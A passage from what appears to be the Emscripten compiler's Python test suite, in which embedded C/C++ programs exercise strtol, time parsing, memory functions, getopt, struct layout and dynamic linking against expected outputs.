long long int l2 = strtoll(end_char, &end_char, 0);
long long int l3 = strtoll(end_char, NULL, 0);
// defined base
long long int l4 = strtoll(STRING, &end_char, 16);
long long int l5 = strtoll(end_char, &end_char, 16);
long long int l6 = strtoll(end_char, NULL, 16);
printf("%d%d%d%d%d%d\n", l1==0x4, l2==-0x3a, l3==0xdeadbeef, l4==0x4, l5==-0x3a, l6==0xdeadbeef);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtoll_dec(self):
if self.emcc_args is None: return self.skip('requires emcc')
# tests strtoll for decimal strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "4 -38 +4711";
char *end_char;
// undefined base
long long int l1 = strtoll(STRING, &end_char, 0);
long long int l2 = strtoll(end_char, &end_char, 0);
long long int l3 = strtoll(end_char, NULL, 0);
// defined base
long long int l4 = strtoll(STRING, &end_char, 10);
long long int l5 = strtoll(end_char, &end_char, 10);
long long int l6 = strtoll(end_char, NULL, 10);
printf("%d%d%d%d%d%d\n", l1==4, l2==-38, l3==4711, l4==4, l5==-38, l6==4711);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtoll_bin(self):
if self.emcc_args is None: return self.skip('requires emcc')
# tests strtoll for binary strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "1 -101 +1011";
char *end_char;
// defined base
long long int l4 = strtoll(STRING, &end_char, 2);
long long int l5 = strtoll(end_char, &end_char, 2);
long long int l6 = strtoll(end_char, NULL, 2);
printf("%d%d%d\n", l4==1, l5==-5, l6==11);
return 0;
}
'''
self.do_run(src, '111')
def test_strtoll_oct(self):
if self.emcc_args is None: return self.skip('requires emcc')
# tests strtoll for decimal strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "0 -035 +04711";
char *end_char;
// undefined base
long long int l1 = strtoll(STRING, &end_char, 0);
long long int l2 = strtoll(end_char, &end_char, 0);
long long int l3 = strtoll(end_char, NULL, 0);
// defined base
long long int l4 = strtoll(STRING, &end_char, 8);
long long int l5 = strtoll(end_char, &end_char, 8);
long long int l6 = strtoll(end_char, NULL, 8);
printf("%d%d%d%d%d%d\n", l1==0, l2==-29, l3==2505, l4==0, l5==-29, l6==2505);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtol_hex(self):
# tests strtoll for hex strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "0x4 -0x3A +0xDEAD";
char *end_char;
// undefined base
long l1 = strtol(STRING, &end_char, 0);
long l2 = strtol(end_char, &end_char, 0);
long l3 = strtol(end_char, NULL, 0);
// defined base
long l4 = strtol(STRING, &end_char, 16);
long l5 = strtol(end_char, &end_char, 16);
long l6 = strtol(end_char, NULL, 16);
printf("%d%d%d%d%d%d\n", l1==0x4, l2==-0x3a, l3==0xdead, l4==0x4, l5==-0x3a, l6==0xdead);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtol_dec(self):
# tests strtoll for decimal strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "4 -38 +4711";
char *end_char;
// undefined base
long l1 = strtol(STRING, &end_char, 0);
long l2 = strtol(end_char, &end_char, 0);
long l3 = strtol(end_char, NULL, 0);
// defined base
long l4 = strtol(STRING, &end_char, 10);
long l5 = strtol(end_char, &end_char, 10);
long l6 = strtol(end_char, NULL, 10);
printf("%d%d%d%d%d%d\n", l1==4, l2==-38, l3==4711, l4==4, l5==-38, l6==4711);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtol_bin(self):
# tests strtoll for binary strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "1 -101 +1011";
char *end_char;
// defined base
long l4 = strtol(STRING, &end_char, 2);
long l5 = strtol(end_char, &end_char, 2);
long l6 = strtol(end_char, NULL, 2);
printf("%d%d%d\n", l4==1, l5==-5, l6==11);
return 0;
}
'''
self.do_run(src, '111')
def test_strtol_oct(self):
# tests strtoll for decimal strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "0 -035 +04711";
char *end_char;
// undefined base
long l1 = strtol(STRING, &end_char, 0);
long l2 = strtol(end_char, &end_char, 0);
long l3 = strtol(end_char, NULL, 0);
// defined base
long l4 = strtol(STRING, &end_char, 8);
long l5 = strtol(end_char, &end_char, 8);
long l6 = strtol(end_char, NULL, 8);
printf("%d%d%d%d%d%d\n", l1==0, l2==-29, l3==2505, l4==0, l5==-29, l6==2505);
return 0;
}
'''
self.do_run(src, '111111')
def test_atexit(self):
# Confirms they are called in reverse order
src = r'''
#include <stdio.h>
#include <stdlib.h>
static void cleanA() {
printf("A");
}
static void cleanB() {
printf("B");
}
int main() {
atexit(cleanA);
atexit(cleanB);
return 0;
}
'''
self.do_run(src, 'BA')
def test_time(self):
# XXX Not sure what the right output is here. Looks like the test started failing with daylight savings changes. Modified it to pass again.
src = open(path_from_root('tests', 'time', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'time', 'output.txt'), 'r').read()
expected2 = open(path_from_root('tests', 'time', 'output2.txt'), 'r').read()
self.do_run(src, [expected, expected2],
extra_emscripten_args=['-H', 'libc/time.h'])
#extra_emscripten_args=['-H', 'libc/fcntl.h,libc/sys/unistd.h,poll.h,libc/math.h,libc/langinfo.h,libc/time.h'])
def test_timeb(self):
# Confirms they are called in reverse order
src = r'''
#include <stdio.h>
#include <assert.h>
#include <sys/timeb.h>
int main() {
timeb tb;
tb.timezone = 1;
printf("*%d\n", ftime(&tb));
assert(tb.time > 10000);
assert(tb.timezone == 0);
assert(tb.dstflag == 0);
return 0;
}
'''
self.do_run(src, '*0\n')
def test_time_c(self):
src = r'''
#include <time.h>
#include <stdio.h>
int main() {
time_t t = time(0);
printf("time: %s\n", ctime(&t));
}
'''
self.do_run(src, 'time: ') # compilation check, mainly
def test_strptime_tm(self):
src=r'''
#include <time.h>
#include <stdio.h>
#include <string.h>
int main() {
struct tm tm;
char *ptr = strptime("17410105012000", "%H%M%S%d%m%Y", &tm);
printf("%s: %s, %d/%d/%d %d:%d:%d",
(ptr != NULL && *ptr=='\0') ? "OK" : "ERR",
tm.tm_wday == 0 ? "Sun" : (tm.tm_wday == 1 ? "Mon" : (tm.tm_wday == 2 ? "Tue" : (tm.tm_wday == 3 ? "Wed" : (tm.tm_wday == 4 ? "Thu" : (tm.tm_wday == 5 ? "Fri" : (tm.tm_wday == 6 ? "Sat" : "ERR")))))),
tm.tm_mon+1,
tm.tm_mday,
tm.tm_year+1900,
tm.tm_hour,
tm.tm_min,
tm.tm_sec
);
}
'''
self.do_run(src, 'OK: Wed, 1/5/2000 17:41:1')
def test_strptime_days(self):
src = r'''
#include <time.h>
#include <stdio.h>
#include <string.h>
static const struct {
const char *input;
const char *format;
} day_tests[] = {
{ "2000-01-01", "%Y-%m-%d"},
{ "03/03/00", "%D"},
{ "9/9/99", "%x"},
{ "19990502123412", "%Y%m%d%H%M%S"},
{ "2001 20 Mon", "%Y %U %a"},
{ "2006 4 Fri", "%Y %U %a"},
{ "2001 21 Mon", "%Y %W %a"},
{ "2013 29 Wed", "%Y %W %a"},
{ "2000-01-01 08:12:21 AM", "%Y-%m-%d %I:%M:%S %p"},
{ "2000-01-01 08:12:21 PM", "%Y-%m-%d %I:%M:%S %p"},
{ "2001 17 Tue", "%Y %U %a"},
{ "2001 8 Thursday", "%Y %W %a"},
};
int main() {
struct tm tm;
for (int i = 0; i < sizeof (day_tests) / sizeof (day_tests[0]); ++i) {
memset (&tm, '\0', sizeof (tm));
char *ptr = strptime(day_tests[i].input, day_tests[i].format, &tm);
printf("%s: %d/%d/%d (%dth DoW, %dth DoY)\n", (ptr != NULL && *ptr=='\0') ? "OK" : "ERR", tm.tm_mon+1, tm.tm_mday, 1900+tm.tm_year, tm.tm_wday, tm.tm_yday);
}
}
'''
self.do_run(src, 'OK: 1/1/2000 (6th DoW, 0th DoY)\n'\
'OK: 3/3/2000 (5th DoW, 62th DoY)\n'\
'OK: 9/9/1999 (4th DoW, 251th DoY)\n'\
'OK: 5/2/1999 (0th DoW, 121th DoY)\n'\
'OK: 5/21/2001 (1th DoW, 140th DoY)\n'\
'OK: 1/27/2006 (5th DoW, 26th DoY)\n'\
'OK: 5/21/2001 (1th DoW, 140th DoY)\n'\
'OK: 7/24/2013 (3th DoW, 204th DoY)\n'\
'OK: 1/1/2000 (6th DoW, 0th DoY)\n'\
'OK: 1/1/2000 (6th DoW, 0th DoY)\n'\
'OK: 5/1/2001 (2th DoW, 120th DoY)\n'\
'OK: 2/22/2001 (4th DoW, 52th DoY)\n'\
)
def test_strptime_reentrant(self):
src=r'''
#include <time.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main () {
int result = 0;
struct tm tm;
memset (&tm, 0xaa, sizeof (tm));
/* Test we don't crash on uninitialized struct tm.
Some fields might contain bogus values until everything
needed is initialized, but we shouldn't crash. */
if (strptime ("2007", "%Y", &tm) == NULL
|| strptime ("12", "%d", &tm) == NULL
|| strptime ("Feb", "%b", &tm) == NULL
|| strptime ("13", "%M", &tm) == NULL
|| strptime ("21", "%S", &tm) == NULL
|| strptime ("16", "%H", &tm) == NULL) {
printf("ERR: returned NULL");
exit(EXIT_FAILURE);
}
if (tm.tm_sec != 21 || tm.tm_min != 13 || tm.tm_hour != 16
|| tm.tm_mday != 12 || tm.tm_mon != 1 || tm.tm_year != 107
|| tm.tm_wday != 1 || tm.tm_yday != 42) {
printf("ERR: unexpected tm content (1) - %d/%d/%d %d:%d:%d", tm.tm_mon+1, tm.tm_mday, tm.tm_year+1900, tm.tm_hour, tm.tm_min, tm.tm_sec);
exit(EXIT_FAILURE);
}
if (strptime ("8", "%d", &tm) == NULL) {
printf("ERR: strptime failed");
exit(EXIT_FAILURE);
}
if (tm.tm_sec != 21 || tm.tm_min != 13 || tm.tm_hour != 16
|| tm.tm_mday != 8 || tm.tm_mon != 1 || tm.tm_year != 107
|| tm.tm_wday != 4 || tm.tm_yday != 38) {
printf("ERR: unexpected tm content (2) - %d/%d/%d %d:%d:%d", tm.tm_mon+1, tm.tm_mday, tm.tm_year+1900, tm.tm_hour, tm.tm_min, tm.tm_sec);
exit(EXIT_FAILURE);
}
printf("OK");
}
'''
self.do_run(src, 'OK')
def test_intentional_fault(self):
# Some programs intentionally segfault themselves, we should compile that into a throw
src = r'''
int main () {
*(volatile char *)0 = 0;
return 0;
}
'''
self.do_run(src, 'fault on write to 0' if not Settings.ASM_JS else 'Assertion: 0')
def test_trickystring(self):
src = r'''
#include <stdio.h>
typedef struct
{
int (*f)(void *);
void *d;
char s[16];
} LMEXFunctionStruct;
int f(void *user)
{
return 0;
}
static LMEXFunctionStruct const a[] =
{
{f, (void *)(int)'a', "aa"}
};
int main()
{
printf("ok\n");
return a[0].f(a[0].d);
}
'''
self.do_run(src, 'ok\n')
def test_statics(self):
# static initializers save i16 but load i8 for some reason (or i64 and load i8)
if Settings.SAFE_HEAP:
Settings.SAFE_HEAP = 3
Settings.SAFE_HEAP_LINES = ['src.cpp:19', 'src.cpp:26', 'src.cpp:28']
src = '''
#include <stdio.h>
#include <string.h>
#define CONSTRLEN 32
char * (*func)(char *, const char *) = NULL;
void conoutfv(const char *fmt)
{
static char buf[CONSTRLEN];
func(buf, fmt); // call by function pointer to make sure we test strcpy here
puts(buf);
}
struct XYZ {
float x, y, z;
XYZ(float a, float b, float c) : x(a), y(b), z(c) { }
static const XYZ& getIdentity()
{
static XYZ iT(1,2,3);
return iT;
}
};
struct S {
static const XYZ& getIdentity()
{
static const XYZ iT(XYZ::getIdentity());
return iT;
}
};
int main() {
func = &strcpy;
conoutfv("*staticccz*");
printf("*%.2f,%.2f,%.2f*\\n", S::getIdentity().x, S::getIdentity().y, S::getIdentity().z);
return 0;
}
'''
self.do_run(src, '*staticccz*\n*1.00,2.00,3.00*')
def test_copyop(self):
if self.emcc_args is None: return self.skip('requires emcc')
# clang generated code is vulnerable to this, as it uses
# memcpy for assignments, with hardcoded numbers of bytes
# (llvm-gcc copies items one by one). See QUANTUM_SIZE in
# settings.js.
src = '''
#include <stdio.h>
#include <math.h>
#include <string.h>
struct vec {
double x,y,z;
vec() : x(0), y(0), z(0) { };
vec(const double a, const double b, const double c) : x(a), y(b), z(c) { };
};
struct basis {
vec a, b, c;
basis(const vec& v) {
a=v; // should not touch b!
printf("*%.2f,%.2f,%.2f*\\n", b.x, b.y, b.z);
}
};
int main() {
basis B(vec(1,0,0));
// Part 2: similar problem with memset and memmove
int x = 1, y = 77, z = 2;
memset((void*)&x, 0, sizeof(int));
memset((void*)&z, 0, sizeof(int));
printf("*%d,%d,%d*\\n", x, y, z);
memcpy((void*)&x, (void*)&z, sizeof(int));
memcpy((void*)&z, (void*)&x, sizeof(int));
printf("*%d,%d,%d*\\n", x, y, z);
memmove((void*)&x, (void*)&z, sizeof(int));
memmove((void*)&z, (void*)&x, sizeof(int));
printf("*%d,%d,%d*\\n", x, y, z);
return 0;
}
'''
self.do_run(src, '*0.00,0.00,0.00*\n*0,77,0*\n*0,77,0*\n*0,77,0*')
def test_memcpy_memcmp(self):
src = '''
#include <stdio.h>
#include <string.h>
#include <assert.h>
#define MAXX 48
void reset(unsigned char *buffer) {
for (int i = 0; i < MAXX; i++) buffer[i] = i+1;
}
void dump(unsigned char *buffer) {
for (int i = 0; i < MAXX-1; i++) printf("%2d,", buffer[i]);
printf("%d\\n", buffer[MAXX-1]);
}
int main() {
unsigned char buffer[MAXX];
for (int i = MAXX/4; i < MAXX-MAXX/4; i++) {
for (int j = MAXX/4; j < MAXX-MAXX/4; j++) {
for (int k = 1; k < MAXX/4; k++) {
if (i == j) continue;
if (i < j && i+k > j) continue;
if (j < i && j+k > i) continue;
printf("[%d,%d,%d] ", i, j, k);
reset(buffer);
memcpy(buffer+i, buffer+j, k);
dump(buffer);
assert(memcmp(buffer+i, buffer+j, k) == 0);
buffer[i + k/2]++;
if (buffer[i + k/2] != 0) {
assert(memcmp(buffer+i, buffer+j, k) > 0);
} else {
assert(memcmp(buffer+i, buffer+j, k) < 0);
}
buffer[i + k/2]--;
buffer[j + k/2]++;
if (buffer[j + k/2] != 0) {
assert(memcmp(buffer+i, buffer+j, k) < 0);
} else {
assert(memcmp(buffer+i, buffer+j, k) > 0);
}
}
}
}
return 0;
}
'''
def check(result, err):
return hashlib.sha1(result).hexdigest()
self.do_run(src, '6c9cdfe937383b79e52ca7a2cce83a21d9f5422c',
output_nicerizer = check)
def test_memcpy2(self):
src = r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
char buffer[256];
for (int i = 0; i < 10; i++) {
for (int j = 0; j < 10; j++) {
for (int k = 0; k < 35; k++) {
for (int t = 0; t < 256; t++) buffer[t] = t;
char *dest = buffer + i + 128;
char *src = buffer+j;
//printf("%d, %d, %d\n", i, j, k);
assert(memcpy(dest, src, k) == dest);
assert(memcmp(dest, src, k) == 0);
}
}
}
printf("ok.\n");
return 1;
}
'''
self.do_run(src, 'ok.');
def test_getopt(self):
if self.emcc_args is None: return self.skip('needs emcc for libc')
src = '''
#pragma clang diagnostic ignored "-Winvalid-pp-token"
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
int
main(int argc, char *argv[])
{
int flags, opt;
int nsecs, tfnd;
nsecs = 0;
tfnd = 0;
flags = 0;
while ((opt = getopt(argc, argv, "nt:")) != -1) {
switch (opt) {
case 'n':
flags = 1;
break;
case 't':
nsecs = atoi(optarg);
tfnd = 1;
break;
default: /* '?' */
fprintf(stderr, "Usage: %s [-t nsecs] [-n] name\\n",
argv[0]);
exit(EXIT_FAILURE);
}
}
printf("flags=%d; tfnd=%d; optind=%d\\n", flags, tfnd, optind);
if (optind >= argc) {
fprintf(stderr, "Expected argument after options\\n");
exit(EXIT_FAILURE);
}
printf("name argument = %s\\n", argv[optind]);
/* Other code omitted */
exit(EXIT_SUCCESS);
}
'''
self.do_run(src, 'flags=1; tfnd=1; optind=4\nname argument = foobar', args=['-t', '12', '-n', 'foobar'])
def test_getopt_long(self):
if self.emcc_args is None: return self.skip('needs emcc for libc')
src = '''
#pragma clang diagnostic ignored "-Winvalid-pp-token"
#pragma clang diagnostic ignored "-Wdeprecated-writable-strings"
#include <stdio.h> /* for printf */
#include <stdlib.h> /* for exit */
#include <getopt.h>
int
main(int argc, char **argv)
{
int c;
int digit_optind = 0;
while (1) {
int this_option_optind = optind ? optind : 1;
int option_index = 0;
static struct option long_options[] = {
{"add", required_argument, 0, 0 },
{"append", no_argument, 0, 0 },
{"delete", required_argument, 0, 0 },
{"verbose", no_argument, 0, 0 },
{"create", required_argument, 0, 'c'},
{"file", required_argument, 0, 0 },
{0, 0, 0, 0 }
};
c = getopt_long(argc, argv, "abc:d:012",
long_options, &option_index);
if (c == -1)
break;
switch (c) {
case 0:
printf("option %s", long_options[option_index].name);
if (optarg)
printf(" with arg %s", optarg);
printf("\\n");
break;
case '0':
case '1':
case '2':
if (digit_optind != 0 && digit_optind != this_option_optind)
printf("digits occur in two different argv-elements.\\n");
digit_optind = this_option_optind;
printf("option %c\\n", c);
break;
case 'a':
printf("option a\\n");
break;
case 'b':
printf("option b\\n");
break;
case 'c':
printf("option c with value '%s'\\n", optarg);
break;
case 'd':
printf("option d with value '%s'\\n", optarg);
break;
case '?':
break;
default:
printf("?? getopt returned character code 0%o ??\\n", c);
}
}
if (optind < argc) {
printf("non-option ARGV-elements: ");
while (optind < argc)
printf("%s ", argv[optind++]);
printf("\\n");
}
exit(EXIT_SUCCESS);
}
'''
self.do_run(src, 'option file with arg foobar\noption b', args=['--file', 'foobar', '-b'])
def test_memmove(self):
src = '''
#include <stdio.h>
#include <string.h>
int main() {
char str[] = "memmove can be very useful....!";
memmove (str+20, str+15, 11);
puts(str);
return 0;
}
'''
self.do_run(src, 'memmove can be very very useful')
def test_memmove2(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('need ta2')
src = r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
int sum = 0;
char buffer[256];
for (int i = 0; i < 10; i++) {
for (int j = 0; j < 10; j++) {
for (int k = 0; k < 35; k++) {
for (int t = 0; t < 256; t++) buffer[t] = t;
char *dest = buffer + i;
char *src = buffer + j;
if (dest == src) continue;
//printf("%d, %d, %d\n", i, j, k);
assert(memmove(dest, src, k) == dest);
for (int t = 0; t < 256; t++) sum += buffer[t];
}
}
}
printf("final: %d.\n", sum);
return 1;
}
'''
self.do_run(src, 'final: -403200.');
def test_memmove3(self):
src = '''
#include <stdio.h>
#include <string.h>
int main() {
char str[] = "memmove can be vvery useful....!";
memmove(str+15, str+16, 17);
puts(str);
return 0;
}
'''
self.do_run(src, 'memmove can be very useful....!')
def test_bsearch(self):
if Settings.QUANTUM_SIZE == 1: return self.skip('Test cannot work with q1')
src = '''
#include <stdlib.h>
#include <stdio.h>
int cmp(const void* key, const void* member) {
return *(int *)key - *(int *)member;
}
void printResult(int* needle, int* haystack, unsigned int len) {
void *result = bsearch(needle, haystack, len, sizeof(unsigned int), cmp);
if (result == NULL) {
printf("null\\n");
} else {
printf("%d\\n", *(unsigned int *)result);
}
}
int main() {
int a[] = { -2, -1, 0, 6, 7, 9 };
int b[] = { 0, 1 };
/* Find all keys that exist. */
for(int i = 0; i < 6; i++) {
int val = a[i];
printResult(&val, a, 6);
}
/* Keys that are covered by the range of the array but aren't in
* the array cannot be found.
*/
int v1 = 3;
int v2 = 8;
printResult(&v1, a, 6);
printResult(&v2, a, 6);
/* Keys outside the range of the array cannot be found. */
int v3 = -1;
int v4 = 2;
printResult(&v3, b, 2);
printResult(&v4, b, 2);
return 0;
}
'''
self.do_run(src, '-2\n-1\n0\n6\n7\n9\nnull\nnull\nnull\nnull')
def test_nestedstructs(self):
src = '''
#include <stdio.h>
#include "emscripten.h"
struct base {
int x;
float y;
union {
int a;
float b;
};
char c;
};
struct hashtableentry {
int key;
base data;
};
struct hashset {
typedef hashtableentry entry;
struct chain { entry elem; chain *next; };
// struct chainchunk { chain chains[100]; chainchunk *next; };
};
struct hashtable : hashset {
hashtable() {
base *b = NULL;
entry *e = NULL;
chain *c = NULL;
printf("*%d,%d,%d,%d,%d,%d|%d,%d,%d,%d,%d,%d,%d,%d|%d,%d,%d,%d,%d,%d,%d,%d,%d,%d*\\n",
sizeof(base),
int(&(b->x)), int(&(b->y)), int(&(b->a)), int(&(b->b)), int(&(b->c)),
sizeof(hashtableentry),
int(&(e->key)), int(&(e->data)), int(&(e->data.x)), int(&(e->data.y)), int(&(e->data.a)), int(&(e->data.b)), int(&(e->data.c)),
sizeof(hashset::chain),
int(&(c->elem)), int(&(c->next)), int(&(c->elem.key)), int(&(c->elem.data)), int(&(c->elem.data.x)), int(&(c->elem.data.y)), int(&(c->elem.data.a)), int(&(c->elem.data.b)), int(&(c->elem.data.c))
);
}
};
struct B { char buffer[62]; int last; char laster; char laster2; };
struct Bits {
unsigned short A : 1;
unsigned short B : 1;
unsigned short C : 1;
unsigned short D : 1;
unsigned short x1 : 1;
unsigned short x2 : 1;
unsigned short x3 : 1;
unsigned short x4 : 1;
};
int main() {
hashtable t;
// Part 2 - the char[] should be compressed, BUT have a padding space at the end so the next
// one is aligned properly. Also handle char; char; etc. properly.
B *b = NULL;
printf("*%d,%d,%d,%d,%d,%d,%d,%d,%d*\\n", int(b), int(&(b->buffer)), int(&(b->buffer[0])), int(&(b->buffer[1])), int(&(b->buffer[2])),
int(&(b->last)), int(&(b->laster)), int(&(b->laster2)), sizeof(B));
// Part 3 - bitfields, and small structures
Bits *b2 = NULL;
printf("*%d*\\n", sizeof(Bits));
return 0;
}
'''
if Settings.QUANTUM_SIZE == 1:
# Compressed memory. Note that sizeof() does give the fat sizes, however!
self.do_run(src, '*16,0,1,2,2,3|20,0,1,1,2,3,3,4|24,0,5,0,1,1,2,3,3,4*\n*0,0,0,1,2,62,63,64,72*\n*2*')
else:
# Bloated memory; same layout as C/C++
self.do_run(src, '*16,0,4,8,8,12|20,0,4,4,8,12,12,16|24,0,20,0,4,4,8,12,12,16*\n*0,0,0,1,2,64,68,69,72*\n*2*')
def test_runtimelink(self):
return self.skip('shared libs are deprecated')
if Building.LLVM_OPTS: return self.skip('LLVM opts will optimize printf into puts in the parent, and the child will still look for puts')
if Settings.ASM_JS: return self.skip('asm does not support runtime linking')
main, supp = self.setup_runtimelink_test()
self.banned_js_engines = [NODE_JS] # node's global scope behaves differently than everything else, needs investigation FIXME
Settings.LINKABLE = 1
Settings.BUILD_AS_SHARED_LIB = 2
Settings.NAMED_GLOBALS = 1
self.build(supp, self.get_dir(), self.in_dir('supp.cpp'))
shutil.move(self.in_dir('supp.cpp.o.js'), self.in_dir('liblib.so'))
Settings.BUILD_AS_SHARED_LIB = 0
Settings.RUNTIME_LINKED_LIBS = ['liblib.so'];
self.do_run(main, 'supp: 54,2\nmain: 56\nsupp see: 543\nmain see: 76\nok.')
def test_dlfcn_basic(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
Settings.NAMED_GLOBALS = 1
Settings.LINKABLE = 1
lib_src = '''
#include <cstdio>
class Foo {
public:
Foo() {
printf("Constructing lib object.\\n");
}
};
Foo global;
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = '''
#include <cstdio>
#include <dlfcn.h>
class Bar {
public:
Bar() {
printf("Constructing main object.\\n");
}
};
Bar global;
int main() {
dlopen("liblib.so", RTLD_NOW);
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, 'Constructing main object.\nConstructing lib object.\n',
post_build=add_pre_run_and_checks)
def test_dlfcn_qsort(self):
return self.skip('shared libs are deprecated')
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
Settings.LINKABLE = 1
Settings.NAMED_GLOBALS = 1
if Settings.USE_TYPED_ARRAYS == 2:
Settings.CORRECT_SIGNS = 1 # Needed for unsafe optimizations
lib_src = '''
int lib_cmp(const void* left, const void* right) {
const int* a = (const int*) left;
const int* b = (const int*) right;
if(*a > *b) return 1;
else if(*a == *b) return 0;
else return -1;
}
typedef int (*CMP_TYPE)(const void*, const void*);
extern "C" CMP_TYPE get_cmp() {
return lib_cmp;
}
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
Settings.EXPORTED_FUNCTIONS = ['_get_cmp']
self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
typedef int (*CMP_TYPE)(const void*, const void*);
int main_cmp(const void* left, const void* right) {
const int* a = (const int*) left;
const int* b = (const int*) right;
if(*a < *b) return 1;
else if(*a == *b) return 0;
else return -1;
}
int main() {
void* lib_handle;
CMP_TYPE (*getter_ptr)();
CMP_TYPE lib_cmp_ptr;
int arr[5] = {4, 2, 5, 1, 3};
lib_handle = dlopen("liblib.so", RTLD_NOW);
if (lib_handle == NULL) {
printf("Could not load lib.\\n");
return 1;
}
getter_ptr = (CMP_TYPE (*)()) dlsym(lib_handle, "get_cmp");
if (getter_ptr == NULL) {
printf("Could not find func.\\n");
return 1;
}
lib_cmp_ptr = getter_ptr();
qsort((void*)arr, 5, sizeof(int), main_cmp);
printf("Sort with main comparison: ");
for (int i = 0; i < 5; i++) {
printf("%d ", arr[i]);
}
printf("\\n");
qsort((void*)arr, 5, sizeof(int), lib_cmp_ptr);
printf("Sort with lib comparison: ");
for (int i = 0; i < 5; i++) {
printf("%d ", arr[i]);
}
printf("\\n");
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
Settings.EXPORTED_FUNCTIONS = ['_main']
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, 'Sort with main comparison: 5 4 3 2 1 *Sort with lib comparison: 1 2 3 4 5 *',
output_nicerizer=lambda x, err: x.replace('\n', '*'),
post_build=add_pre_run_and_checks)
def test_dlfcn_data_and_fptr(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
if Building.LLVM_OPTS: return self.skip('LLVM opts will optimize out parent_func')
Settings.LINKABLE = 1
Settings.NAMED_GLOBALS = 1
lib_src = '''
#include <stdio.h>
int global = 42;
extern void parent_func(); // a function that is defined in the parent
void lib_fptr() {
printf("Second calling lib_fptr from main.\\n");
parent_func();
// call it also through a pointer, to check indexizing
void (*p_f)();
p_f = parent_func;
p_f();
}
extern "C" void (*func(int x, void(*fptr)()))() {
printf("In func: %d\\n", x);
fptr();
return lib_fptr;
}
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
Settings.EXPORTED_FUNCTIONS = ['_func']
Settings.EXPORTED_GLOBALS = ['_global']
self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = '''
#include <stdio.h>
#include <dlfcn.h>
typedef void (*FUNCTYPE(int, void(*)()))();
FUNCTYPE func;
void parent_func() {
printf("parent_func called from child\\n");
}
void main_fptr() {
printf("First calling main_fptr from lib.\\n");
}
int main() {
void* lib_handle;
FUNCTYPE* func_fptr;
// Test basic lib loading.
lib_handle = dlopen("liblib.so", RTLD_NOW);
if (lib_handle == NULL) {
printf("Could not load lib.\\n");
return 1;
}
// Test looked up function.
func_fptr = (FUNCTYPE*) dlsym(lib_handle, "func");
// Load twice to test cache.
func_fptr = (FUNCTYPE*) dlsym(lib_handle, "func");
if (func_fptr == NULL) {
printf("Could not find func.\\n");
return 1;
}
// Test passing function pointers across module bounds.
void (*fptr)() = func_fptr(13, main_fptr);
fptr();
// Test global data.
int* global = (int*) dlsym(lib_handle, "global");
if (global == NULL) {
printf("Could not find global.\\n");
return 1;
}
printf("Var: %d\\n", *global);
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
Settings.EXPORTED_FUNCTIONS = ['_main']
Settings.EXPORTED_GLOBALS = []
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, 'In func: 13*First calling main_fptr from lib.*Second calling lib_fptr from main.*parent_func called from child*parent_func called from child*Var: 42*',
output_nicerizer=lambda x, err: x.replace('\n', '*'),
post_build=add_pre_run_and_checks)
def test_dlfcn_alias(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
Settings.LINKABLE = 1
Settings.NAMED_GLOBALS = 1
if Building.LLVM_OPTS == 2: return self.skip('LLVM LTO will optimize away stuff we expect from the shared library')
lib_src = r'''
#include <stdio.h>
extern int parent_global;
extern "C" void func() {
printf("Parent global: %d.\n", parent_global);
}
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
Settings.EXPORTED_FUNCTIONS = ['_func']
